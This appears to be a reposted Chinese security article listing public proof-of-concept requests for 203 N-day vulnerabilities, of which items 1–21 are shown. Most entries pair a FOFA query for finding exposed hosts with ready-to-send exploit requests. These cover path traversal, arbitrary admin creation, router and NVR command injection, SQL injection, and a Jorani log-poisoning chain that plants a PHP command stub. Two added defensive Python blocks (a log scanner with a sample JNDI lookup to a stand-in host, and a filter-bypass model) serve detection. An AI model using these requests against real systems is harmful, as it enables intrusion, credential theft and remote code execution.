Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06
道一安全  2024-06-05 07:41  Beijing
The following article is reposted from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. This article is meant to help defenders; blue teams can use the entries below to check their own exposure.

Sources: the article covers 203 public proof-of-concept (POC) requests for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: every entry is a publicly known vulnerability; for patches or remediation guidance, contact the product vendor.

Content: for space reasons, a few overly long POCs have their payload replaced by the literal word PAYLOAD; search for the complete POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the relevant content will be removed.

Statement
To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the complete, current list; use your browser's find-in-page function to search for a keyword.

Bookmark this article if it is useful to you, or follow the public account (网络安全新视界).
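Since the stated purpose of the list is defensive triage, here is an added example (not part of the original article, and not any vendor's code) of how a defender can sweep existing web-server access logs for the request shapes that recur in the POCs below: `../` traversal (items 2, 15), the `;.ico` path-parameter trick (item 14), the NUUO debug endpoint (item 5), Sangfor `loadfile.php` (item 6), `${jndi:` lookups in any field the log records (item 22), and the error-based and time-based SQL functions used in items 9, 17, 19, 26 and 27. It assumes Apache/Nginx combined log format; the sample log lines are constructed for the demonstration and the IPs and hostnames in them are placeholders. The rule names are this example's own labels. Because an access log keeps only the request line, referer and user agent, body-borne indicators such as the fastjson `@type` probes in items 21 and 23 are out of reach here and need a proxy or WAF that logs request bodies.

```python
import re
from urllib.parse import unquote_plus

# (rule name, regex) pairs. Each regex is applied to the percent-decoded request
# target, referer and user agent. Names are this example's own labels.
RULES = [
    ("path-traversal", re.compile(r"(^|/)\.\.(/|\\|$)")),
    ("path-param-suffix-bypass", re.compile(r";\.(ico|js|css|png|jpg)(\?|/|$)", re.I)),
    ("nuuo-debug-center", re.compile(r"/__debugging_center_utils___\.php")),
    ("sangfor-loadfile", re.compile(r"/svpn_html/loadfile\.php\?file=")),
    ("log4shell-jndi", re.compile(r"\$\{jndi:", re.I)),
    ("sqli-error-based", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("sqli-time-based", re.compile(r"waitfor\s+delay|dbms_pipe\.receive_message", re.I)),
    ("jsherp-getalllist", re.compile(r"/jshERP-boot/user/.*getAllList", re.I)),
]

# Apache/Nginx "combined" format:
# ip ident user [time] "METHOD target HTTP/x.y" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def decode(value: str) -> str:
    """Percent-decode twice: the Doccms PoC (item 9) double-encodes its payload,
    and decoding an already-decoded string is harmless for matching purposes."""
    return unquote_plus(unquote_plus(value))


def scan_line(line: str) -> list:
    """Return the names of all rules that match one log line, in RULES order.
    Unparsable lines return an empty list rather than raising."""
    m = LOG_RE.match(line)
    if not m:
        return []
    fields = [decode(m.group(k)) for k in ("target", "referer", "ua")]
    return [name for name, rx in RULES if any(rx.search(f) for f in fields)]


def scan(lines) -> dict:
    """Map line index -> matched rule names for every line that hits a rule."""
    hits = {}
    for i, line in enumerate(lines):
        names = scan_line(line)
        if names:
            hits[i] = names
    return hits


# Constructed sample log (not real traffic); the request targets mirror items 2, 14, 5, 9 and 26.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jun/2024:07:41:00 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [05/Jun/2024:07:41:01 +0800] "GET /static/../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jun/2024:07:41:02 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 9021 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [05/Jun/2024:07:41:03 +0800] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 40 "-" "curl/8.0"',
    '203.0.113.9 - - [05/Jun/2024:07:41:04 +0800] "GET /search/index.php?keyword=%2527%2520and%2520(extractvalue(1,concat(0x7e,(select%2520user()),0x7e)))%2523 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [05/Jun/2024:07:41:05 +0800] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1%27waitfor+delay+%270:0:5%27-- HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [05/Jun/2024:07:41:06 +0800] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://attacker.invalid/a}"',
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(names)}")
```

Run it against a real file with `scan(open(path).readlines())`; a hit is a lead, not a verdict, so check the response status and size on the same line (a 200 with a large body on the `getAllList` request is far more alarming than a 404).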
01  Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8 Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 DesignReportSave.jsp arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaboration platform editflow_manager SQL injection
90. Hikvision IP intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform web.php import arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communications dispatch platform down_file.php SQL injection
138. 福建科立讯 communications dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications dispatch platform get_extension_yl.php SQL injection
141. 科立讯 communications dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking payment system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle tracking platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. 短视频矩阵营销系统 poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

02  POC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password you want the new account to have.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin interface with the default admin account first, then send the following request. The injected command (here id) goes in the wifiRebootrange field.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoded form of the following statement:
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: fetch the login page to obtain the session and CSRF cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. The language parameter traverses to the application's log directory, and the login field carries a PHP stub that base64-decodes and executes whatever arrives in the K1SYJPMHLU4Z request header; the failed login gets that stub written into the day's log file.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: request the poisoned log page to run the id command. The K1SYJPMHLU4Z header holds the base64-encoded command; ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= decodes to echo ---------;id 2>&1;echo ---------;
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

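Items 14 and 15 reach the same getAllList handler through two differently shaped URIs, which is the signature of an authorization filter that inspects a different string than the one the framework routes on. The article does not give the root cause; the Python below is an added example (not jshERP code, nor Spring or Shiro code) that models the assumed mechanism: a pre-authentication filter that whitelists "static-looking" requests by substring match on the raw URI, against a container/MVC layer that strips `;param` path parameters, percent-decodes and collapses `..` before choosing the handler. The two `/jshERP-boot/...` paths are taken from the PoCs above; the third variant, the whitelist contents and the public endpoints are assumptions made for the demonstration. The hardened check decides on the canonical path instead.

```python
from posixpath import normpath
from urllib.parse import unquote

# Assumed whitelist of a naive login interceptor: substring markers on the raw URI.
ANON_MARKERS = (".ico", ".js", ".css", ".png", "/user/login", "/user/registerUser")

# Assumed public endpoints, expressed as exact canonical paths for the hardened check.
ANON_EXACT = {"/jshERP-boot/user/login", "/jshERP-boot/user/registerUser"}
STATIC_SUFFIXES = (".ico", ".js", ".css", ".png")


def canonical_path(raw_uri: str) -> str:
    """Model of the path the dispatcher actually routes on: drop the query string,
    strip ';param' from every segment, percent-decode, then collapse '.' and '..'."""
    path = raw_uri.split("?", 1)[0]
    segments = [unquote(seg.split(";", 1)[0]) for seg in path.split("/")]
    canon = normpath("/".join(segments))
    return canon if canon.startswith("/") else "/" + canon


def naive_allows(raw_uri: str) -> bool:
    """Vulnerable check: whitelist by substring on the raw request URI.
    Anything containing '.ico' (including 'getAllList;.ico' or 'a.ico/..') passes."""
    return any(marker in raw_uri for marker in ANON_MARKERS)


def hardened_allows(raw_uri: str) -> bool:
    """Fixed check: decide on the canonical path, exact match for dynamic endpoints,
    whole-suffix test for static files. Everything else requires a login."""
    path = canonical_path(raw_uri)
    return path in ANON_EXACT or path.endswith(STATIC_SUFFIXES)


def dispatch(raw_uri: str, allows) -> tuple:
    """Return (decision, routed_path): what the filter decided and where the
    framework would actually send the request."""
    routed = canonical_path(raw_uri)
    decision = "anonymous" if allows(raw_uri) else "login-required"
    return decision, routed


POCS = [
    "/jshERP-boot/user/getAllList;.ico",            # item 14
    "/jshERP-boot/user/a.ico/../getAllList",        # item 15 (CVE-2024-0490)
    "/jshERP-boot/user/a.ico/%2e%2e/getAllList",    # constructed: percent-encoded '..'
]

if __name__ == "__main__":
    for uri in POCS + ["/jshERP-boot/favicon.ico", "/jshERP-boot/user/login"]:
        print(f"{uri:45} naive={dispatch(uri, naive_allows)}  "
              f"hardened={dispatch(uri, hardened_allows)}")
```

The general lesson, and the reason the same two tricks recur against other Java applications on this list, is that access control must run on exactly the string the router uses; in a real deployment that means letting the framework's own path matcher do the whitelisting rather than reimplementing it with `contains` or `endsWith` on `getRequestURI()`.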
16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls HASHBYTES (SQL Server) inside the injected sort expression to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
